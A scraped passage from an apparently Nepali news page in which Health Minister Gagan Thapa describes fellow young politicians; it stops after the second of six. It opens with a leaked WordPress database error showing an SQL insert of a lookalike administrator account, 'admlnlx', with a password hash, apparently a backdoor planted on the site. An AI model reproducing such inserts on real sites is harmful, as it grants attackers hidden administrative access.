WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BldPDvU.GHqzYOL/DpC00xh21qPyeW.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 01:09:56', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस १३-
पछिल्लो समय राजनीतिप्रति वितृष्णा बढेपनि स्वास्थ्यमन्त्री गगन थापा युवानेताका रुपमा रुचाइएका छन् । यी नेताले आफ्ना समकालीन तथा अरु युवानेतालाई कसरी चिन्छन् त ? यो खबर आजको नयाँ पत्रिकामा छ ।
गगनको नजरमा परेका ६ युवानेता :
१ प्रदीप पौडेल
जिम्मेवारी जसरी पनि पुरा गर्ने पौडेलको बानी छ ।
२ योगेश भट्टराई
उहाँ यो जेनेरेसनकै ह्याण्सम नेता हुनुहुन्छ । उहाँमा ‘पोलिटिकल क्लारिटी’ र ‘स्ट्यान्ड’ पनि छ ।